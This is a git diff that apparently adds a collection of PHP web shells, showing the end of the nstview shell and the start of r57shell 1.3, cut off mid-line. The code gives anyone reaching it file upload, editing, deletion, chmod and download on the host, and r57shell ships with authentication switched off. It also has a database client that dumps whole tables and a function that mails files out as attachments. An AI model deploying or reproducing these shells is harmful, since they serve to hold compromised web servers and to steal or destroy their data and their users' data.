(@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile1</i><br>";} +if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile2</i><br>";} +if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile3</i><br>";} +if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile4</i><br>";} +if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile5</i><br>";} +if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile6</i><br>";} +if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile7</i><br>";} +if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile8</i><br>";} +if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile9</i><br>";} +if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile10</i><br>";} +if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile11</i><br>";} +if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile12</i><br>";} +if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile13</i><br>";} +if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile14</i><br>";} +if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile15</i><br>";} +if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile16</i><br>";} +if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile17</i><br>";} +if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile18</i><br>";} +if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile19</i><br>";} +if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>Uploaded to $uploadfile20</i><br>";} +} +echo $copyr; +exit;} + +if(@$_GET['yes']=="yes"){ +$d=@$_GET['d']; $e=@$_GET['e']; +unlink($d."/".$e); +$delresult="Success $d/$e deleted <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?d=$d\">"; +} +if(@$_GET['clean']=="1"){ +@$e=$_GET['e']; +$x=fopen("$d/$e","w"); +fwrite($x,""); +echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=".@$e."\">"; +exit; +} + + +if(@$_GET['e']){ +$d=@$_GET['d']; +$e=@$_GET['e']; +$pinf=pathinfo($e); +if(in_array(".".@$pinf['extension'],$images)){ +echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e&img=1\">"; +exit;} +$filename="$d/$e"; +$fd = @fopen ($filename, "r"); +$c = @fread ($fd, @filesize ($filename)); +$c=htmlspecialchars($c); +$de=$d."/".$e; +$de=str_replace("//","/",$de); +if(is_file($de)){ +if(!is_writable($de)){echo "<font color=red>READ ONLY</font><br>";}} +echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>"; +echo " +File contents:<br> +$de +<br> +<table width=100% border=1 cellpadding=0 cellspacing=0> +<tr><td><pre> +$c + +</pre></td></tr> +</table> + +"; + +if(@$_GET['delete']=="1"){ +$delete=$_GET['delete']; +echo " +DELETE: Are you sure?<br> +<a href=\"$php_self?d=$d&e=$e&delete=".@$delete."&yes=yes\">Yes</a> || <a href='$php_self?no=1'>No</a> +<br> +"; +if(@$_GET['yes']=="yes"){ +@$d=$_GET['d']; @$e=$_GET['e']; +echo $delresult; +} +if(@$_GET['no']){ +echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e\"> +"; +} + + +} #end of delete +echo $copyr; +exit; +} #end of e + +if(@$_GET['edit']=="1"){ +@$d=$_GET['d']; +@$ef=$_GET['ef']; +$e=$ef; +if(is_file($d."/".$ef)){ +if(!is_writable($d."/".$ef)){echo "<font color=red>READ ONLY</font><br>";}} +echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>"; +$filename="$d/$ef"; +$fd = @fopen ($filename, "r"); +$c = @fread ($fd, @filesize ($filename)); +$c=htmlspecialchars($c); +$de=$d."/".$ef; +$de=str_replace("//","/",$de); +echo " +Edit:<br> +$de<br>"; + +if(!@$_POST['save']){ +print " +<form method=post> +<input name=filename value='$d/$ef'> +<textarea cols=143 rows=30 name=editf>$c</textarea> +<br> +<input type=submit name=save value='Save changes'></form><br> +"; +} +if(@$_POST['save']){ +$editf=@$_POST['editf']; + +if(get_magic_quotes_runtime() or get_magic_quotes_gpc()){ +$editf=stripslashes($editf); +} + +$f=fopen($filename,"w+"); +fwrite($f,"$editf"); +echo "<br> +<b>File edited.</b> +<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$ef\">"; +exit; +} +echo $copyr; +exit; +} + + + +echo" +<table width=100% cellpadding=1 cellspacing=0 class=hack> +<tr><td bgcolor=#519A00><center><b>Filename</b></td><td bgcolor=#519A00><center><b>Tools</b></td><td bgcolor=#519A00><b>Size</b></td><td bgcolor=#519A00><center><b>Owner/Group</b></td><td bgcolor=#519A00><b>Perms</b></td></tr> +"; +$dirs=array(); +$files=array(); +$dh = @opendir($d) or die("<table width=100%><tr><td><center>Permission Denied or Folder/Disk does not exist</center><br>$copyr</td></tr></table>"); +while (!(($file = readdir($dh)) === false)) { +if ($file=="." || $file=="..") continue; +if (@is_dir("$d/$file")) { + $dirs[]=$file; +}else{ + $files[]=$file; + } + sort($dirs); + sort($files); + +$fz=@filesize("$d/$file"); +} + +function perm($perms){ +if (($perms & 0xC000) == 0xC000) { + $info = 's'; +} elseif (($perms & 0xA000) == 0xA000) { + $info = 'l'; +} elseif (($perms & 0x8000) == 0x8000) { + $info = '-'; +} elseif (($perms & 0x6000) == 0x6000) { + $info = 'b'; +} elseif (($perms & 0x4000) == 0x4000) { + $info = 'd'; +} elseif (($perms & 0x2000) == 0x2000) { + $info = 'c'; +} elseif (($perms & 0x1000) == 0x1000) { + $info = 'p'; +} else { + $info = 'u'; +} +$info .= (($perms & 0x0100) ? 'r' : '-'); +$info .= (($perms & 0x0080) ? 'w' : '-'); +$info .= (($perms & 0x0040) ? + (($perms & 0x0800) ? 's' : 'x' ) : + (($perms & 0x0800) ? 'S' : '-')); +$info .= (($perms & 0x0020) ? 'r' : '-'); +$info .= (($perms & 0x0010) ? 'w' : '-'); +$info .= (($perms & 0x0008) ? + (($perms & 0x0400) ? 's' : 'x' ) : + (($perms & 0x0400) ? 'S' : '-')); +$info .= (($perms & 0x0004) ? 'r' : '-'); +$info .= (($perms & 0x0002) ? 'w' : '-'); +$info .= (($perms & 0x0001) ? + (($perms & 0x0200) ? 't' : 'x' ) : + (($perms & 0x0200) ? 'T' : '-')); +return $info; +} + + +for($i=0; $i<count($dirs); $i++){ + +$perms = @fileperms($d."/".$dirs[$i]); +$owner = @fileowner($d."/".$dirs[$i]); +if($os=="unix"){ +$fileownera=posix_getpwuid($owner); +$owner=$fileownera['name']; +} +$group = @filegroup($d."/".$dirs[$i]); +if($os=="unix"){ +$groupinfo = posix_getgrgid($group); +$group=$groupinfo['name']; +} +$info=perm($perms); +if($i%2){$color="#D7FFA8";}else{$color="#D1D1D1";} +$linkd="<a href='$php_self?d=$d/$dirs[$i]'>$dirs[$i]</a>"; +$linkd=str_replace("//","/",$linkd); +echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color><center><font color=blue>DIR</font></td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>"; +} + +for($i=0; $i<count($files); $i++){ + +$size=@filesize($d."/".$files[$i]); +$perms = @fileperms($d."/".$files[$i]); +$owner = @fileowner($d."/".$files[$i]); +if($os=="unix"){ +$fileownera=posix_getpwuid($owner); +$owner=$fileownera['name']; +} +$group = @filegroup($d."/".$files[$i]); +if($os=="unix"){ +$groupinfo = posix_getgrgid($group); +$group=$groupinfo['name']; +} +$info=perm($perms); +if($i%2){$color="#D1D1D1";}else{$color="#D7FFA8";} + +if ($size < 1024){$siz=$size.' b'; +}else{ +if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{ +if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{ +if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';} +}}} +echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?d=$d&e=$files[$i]'>$files[$i]</a></td><td bgcolor=$color><center><a href=\"javascript:ShowOrHide('$i','')\">[options]</a><div id='$i' style='display:none;z-index:1;' ><a href='$php_self?d=$d&ef=$files[$i]&edit=1' title='Edit $files[$i]'><b>Edit</b></a><br><a href='$php_self?d=$d&del_f=1&wich_f=$files[$i]' title='Delete $files[$i]'><b>Delete</b></a><br><a href='$php_self?d=$d&chmod=1&wich_f=$files[$i]' title='chmod $files[$i]'><b>CHMOD</b></a><br><a href='$php_self?d=$d&rename=1&wich_f=$files[$i]' title='Rename $files[$i]'><b>Rename</b></a><br><a href='$php_self?d=$d&download=$files[$i]' title='Download $files[$i]'><b>Download</b></a><br><a href='$php_self?d=$d&ccopy_to=$files[$i]' title='Copy $files[$i] to?'><b>Copy</b></a></div></td><td bgcolor=$color>$siz</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>"; +} + +echo "</table></td></tr></table>"; +echo $copyr; + +?> +<!-- Network security team :: nst.void.ru --> \ No newline at end of file diff --git a/php/PHPshell/nstview/nstview2.jpg b/php/PHPshell/nstview/nstview2.jpg new file mode 100644 index 0000000..ac31115 Binary files /dev/null and b/php/PHPshell/nstview/nstview2.jpg differ diff --git a/php/PHPshell/r57shell/r57shell.jpg b/php/PHPshell/r57shell/r57shell.jpg new file mode 100644 index 0000000..d2ff4c3 Binary files /dev/null and b/php/PHPshell/r57shell/r57shell.jpg differ diff --git a/php/PHPshell/r57shell/r57shell.php b/php/PHPshell/r57shell/r57shell.php new file mode 100644 index 0000000..9bd2008 --- /dev/null +++ b/php/PHPshell/r57shell/r57shell.php @@ -0,0 +1,2187 @@ +<?php +/******************************************************************************************************/ +/* +/* # # # # +/* # # # # +/* # # # # +/* # ## #### ## # +/* ## ## ###### ## ## +/* ## ## ###### ## ## +/* ## ## #### ## ## +/* ### ############ ### +/* ######################## +/* ############## +/* ######## ########## ####### +/* ### ## ########## ## ### +/* ### ## ########## ## ### +/* ### # ########## # ### +/* ### ## ######## ## ### +/* ## # ###### # ## +/* ## # #### # ## +/* ## ## +/* +/* +/* +/* r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ????????? ??????? ?? ??????? ????? ??????? +/* ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru +/* ??????: 1.3 (05.03.2006) +/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ +/* ????????? ????????????? ?? ?????? ? ????: blf, phoenix, virus, NorD ? ???? ?????? ?? RST/GHC. +/* ???? ? ??? ???? ?????-???? ???? ?? ?????? ???? ????? ??????? ??????? ???????? ? ?????? ?? ?????? +/* ?? rst@void.ru. ??? ??????????? ????? ???????????. +/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ +/* (c)oded by 1dt.w0lf +/* RST/GHC http://rst.void.ru , http://ghc.ru +/* ANY MODIFIED REPUBLISHING IS RESTRICTED +/******************************************************************************************************/ +/* ~~~ ????????? | Options ~~~ */ + +// ????? ????? | Language +// $language='ru' - ??????? (russian) +// $language='eng' - english (??????????) +$language='eng'; + +// ?????????????? | Authentification +// $auth = 1; - ?????????????? ???????? ( authentification = On ) +// $auth = 0; - ?????????????? ????????? ( authentification = Off ) +$auth = 0; + +// ????? ? ?????? ??? ??????? ? ??????? (Login & Password for access) +// ?? ???????? ??????? ????? ??????????? ?? ???????!!! (CHANGE THIS!!!) +// ????? ? ?????? ????????? ? ??????? ????????? md5, ???????? ?? ????????? 'r57' +// Login & password crypted with md5, default is 'r57' +$name='ec371748dc2da624b35a4f8f685dd122'; // ????? ???????????? (user login) +$pass='ec371748dc2da624b35a4f8f685dd122'; // ?????? ???????????? (user password) +/******************************************************************************************************/ +error_reporting(0); +set_magic_quotes_runtime(0); +@set_time_limit(0); +@ini_set('max_execution_time',0); +@ini_set('output_buffering',0); +$safe_mode = @ini_get('safe_mode'); +$version = "1.3"; +if(version_compare(phpversion(), '4.1.0') == -1) + { + $_POST = &$HTTP_POST_VARS; + $_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + } +if (@get_magic_quotes_gpc()) + { + foreach ($_POST as $k=>$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_SERVER as $k=>$v) + { + $_SERVER[$k] = stripslashes($v); + } + } + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) + { + header('WWW-Authenticate: Basic realm="r57shell"'); + header('HTTP/1.0 401 Unauthorized'); + exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>"); + } +} +$head = '<!-- ?????????? ???? --> +<html> +<head> +<title>WwW.SeCuReDeAtH.cOm</title> +<meta http-equiv="Content-Language" content="ar-sa"> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1256"> + +<STYLE> +tr { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +td { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +.table1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +BACKGROUND-COLOR: #D4D0C8; +} +.td1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +font: 7pt Verdana; +} +.tr1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +} +table { +BORDER-RIGHT: #eeeeee 1px outset; +BORDER-TOP: #eeeeee 1px outset; +BORDER-LEFT: #eeeeee 1px outset; +BORDER-BOTTOM: #eeeeee 1px outset; +BACKGROUND-COLOR: #D4D0C8; +} +input { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +select { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +submit { +BORDER-RIGHT: buttonhighlight 2px outset; +BORDER-TOP: buttonhighlight 2px outset; +BORDER-LEFT: buttonhighlight 2px outset; +BORDER-BOTTOM: buttonhighlight 2px outset; +BACKGROUND-COLOR: #e4e0d8; +width: 30%; +} +textarea { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: Fixedsys bold; +} +BODY { +margin-top: 1px; +margin-right: 1px; +margin-bottom: 1px; +margin-left: 1px; +} +A:link {COLOR:red; TEXT-DECORATION: none} +A:visited { COLOR:red; TEXT-DECORATION: none} +A:active {COLOR:red; TEXT-DECORATION: none} +A:hover {color:blue;TEXT-DECORATION: none} +</STYLE>'; +class zipfile +{ + var $datasec = array(); + var $ctrl_dir = array(); + var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset = 0; + function unix2DosTime($unixtime = 0) { + $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); + if ($timearray['year'] < 1980) { + $timearray['year'] = 1980; + $timearray['mon'] = 1; + $timearray['mday'] = 1; + $timearray['hours'] = 0; + $timearray['minutes'] = 0; + $timearray['seconds'] = 0; + } + return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | + ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); + } + function addFile($data, $name, $time = 0) + { + $name = str_replace('\\', '/', $name); + $dtime = dechex($this->unix2DosTime($time)); + $hexdtime = '\x' . $dtime[6] . $dtime[7] + . '\x' . $dtime[4] . $dtime[5] + . '\x' . $dtime[2] . $dtime[3] + . '\x' . $dtime[0] . $dtime[1]; + eval('$hexdtime = "' . $hexdtime . '";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $c_len = strlen($zdata); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + $fr .= $zdata; + $this -> datasec[] = $fr; + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset += strlen($fr); + $cdrec .= $name; + $this -> ctrl_dir[] = $cdrec; + } + function file() + { + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return + $data . + $ctrldir . + $this -> eof_ctrl_dir . + pack('v', sizeof($this -> ctrl_dir)) . + pack('v', sizeof($this -> ctrl_dir)) . + pack('V', strlen($ctrldir)) . + pack('V', strlen($data)) . + "\x00\x00"; + } +} +function compress(&$filename,&$filedump,$compress) + { + global $content_encoding; + global $mime_type; + if ($compress == 'bzip' && @function_exists('bzcompress')) + { + $filename .= '.bz2'; + $mime_type = 'application/x-bzip2'; + $filedump = bzcompress($filedump); + } + else if ($compress == 'gzip' && @function_exists('gzencode')) + { + $filename .= '.gz'; + $content_encoding = 'x-gzip'; + $mime_type = 'application/x-gzip'; + $filedump = gzencode($filedump); + } + else if ($compress == 'zip' && @function_exists('gzcompress')) + { + $filename .= '.zip'; + $mime_type = 'application/zip'; + $zipfile = new zipfile(); + $zipfile -> addFile($filedump, substr($filename, 0, -4)); + $filedump = $zipfile -> file(); + } + else + { + $mime_type = 'application/octet-stream'; + } + } +function mailattach($to,$from,$subj,$attach) + { + $headers = "From: $from\r\n"; + $headers .= "MIME-Version: 1.0\r\n"; + $headers .= "Content-Type: ".$attach['type']; + $headers .= "; name=\"".$attach['name']."\"\r\n"; + $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; + $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; + if(@mail($to,$subj,"",$headers)) { return 1; } + return 0; + } +class my_sql + { + var $host = 'localhost'; + var $port = ''; + var $user = ''; + var $pass = ''; + var $base = ''; + var $db = ''; + var $connection; + var $res; + var $error; + var $rows; + var $columns; + var $num_rows; + var $num_fields; + var $dump; + + function connect() + { + switch($this->db) + { + case 'MySQL': + if(empty($this->port)) { $this->port = '3306'; } + if(!function_exists('mysql_connect')) return 0; + $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); + if(is_resource($this->connection)) return 1; + break; + case 'MSSQL': + if(empty($this->port)) { $this->port = '1433'; } + if(!function_exists('mssql_connect')) return 0; + $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); + if($this->connection) return 1; + break; + case 'PostgreSQL': + if(empty($this->port)) { $this->port = '5432'; } + $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; + if(!function_exists('pg_connect')) return 0; + $this->connection = @pg_connect($str); + if(is_resource($this->connection)) return 1; + break; + case 'Oracle': + if(!function_exists('ocilogon')) return 0; + $this->connection = @ocilogon($this->user, $this->pass, $this->base); + if(is_resource($this->connection)) return 1; + break; + } + return 0; + } + + function select_db() + { + switch($this->db) + { + case 'MySQL': + if(@mysql_select_db($this->base,$this->connection)) return 1; + break; + case 'MSSQL': + if(@mssql_select_db($this->base,$this->connection)) return 1; + break; + case 'PostgreSQL': + return 1; + break; + case 'Oracle': + return 1; + break; + } + return 0; + } + + function query($query) + { + $this->res=$this->error=''; + switch($this->db) + { + case 'MySQL': + if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) + { + $this->error = @mysql_error($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + case 'MSSQL': + if(false===($this->res=@mssql_query($query,$this->connection))) + { + $this->error = 'Query error'; + return 0; + } + else if(@mssql_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'PostgreSQL': + if(false===($this->res=@pg_query($this->connection,$query))) + { + $this->error = @pg_last_error($this->connection); + return 0; + } + else if(@pg_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'Oracle': + if(false===($this->res=@ociparse($this->connection,$query))) + { + $this->error = 'Query parse error'; + } + else + { + if(@ociexecute($this->res)) + { + if(@ocirowcount($this->res) != 0) return 2; + return 1; + } + $error = @ocierror(); + $this->error=$error['message']; + } + break; + } + return 0; + } + function get_result() + { + $this->rows=array(); + $this->columns=array(); + $this->num_rows=$this->num_fields=0; + switch($this->db) + { + case 'MySQL': + $this->num_rows=@mysql_num_rows($this->res); + $this->num_fields=@mysql_num_fields($this->res); + while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); + @mysql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'MSSQL': + $this->num_rows=@mssql_num_rows($this->res); + $this->num_fields=@mssql_num_fields($this->res); + while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); + @mssql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; + break; + case 'PostgreSQL': + $this->num_rows=@pg_num_rows($this->res); + $this->num_fields=@pg_num_fields($this->res); + while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); + @pg_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'Oracle': + $this->num_fields=@ocinumcols($this->res); + while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; + @ocifreestatement($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + } + return 0; + } + function dump($table) + { + if(empty($table)) return 0; + $this->dump=array(); + $this->dump[0] = '##'; + $this->dump[1] = '## --------------------------------------- '; + $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); + $this->dump[3] = '## Database: '.$this->base; + $this->dump[4] = '## Table: '.$table; + $this->dump[5] = '## --------------------------------------- '; + switch($this->db) + { + case 'MySQL': + $this->dump[0] = '## MySQL dump'; + if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + $this->dump[] = $this->rows[0]['Create Table']; + $this->dump[] = '## --------------------------------------- '; + if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} + $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'MSSQL': + $this->dump[0] = '## MSSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'PostgreSQL': + $this->dump[0] = '## PostgreSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'Oracle': + $this->dump[0] = '## ORACLE dump'; + $this->dump[] = '## under construction'; + break; + default: + return 0; + break; + } + return 1; + } + function close() + { + switch($this->db) + { + case 'MySQL': + @mysql_close($this->connection); + break; + case 'MSSQL': + @mssql_close($this->connection); + break; + case 'PostgreSQL': + @pg_close($this->connection); + break; + case 'Oracle': + @oci_close($this->connection); + break; + } + } + function affected_rows() + { + switch($this->db) + { + case 'MySQL': + return @mysql_affected_rows($this->res); + break; + case 'MSSQL': + return @mssql_affected_rows($this->res); + break; + case 'PostgreSQL': + return @pg_affected_rows($this->res); + break; + case 'Oracle': + return @ocirowcount($this->res); + break; + default: + return 0; + break; + } + } + } +if(isset($_GET['img'])&&!empty($_GET['img'])) + { + $images = array(); + $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw=='; + $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw=='; + @ob_clean(); + header("Content-type: image/gif"); + echo base64_decode($images[$_GET['img']]); + die(); + } +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) + { + if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; } + else + { + @ob_clean(); + $filename = @basename($_POST['d_name']); + $filedump = @fread($file,@filesize($_POST['d_name'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } + header("Content-type: 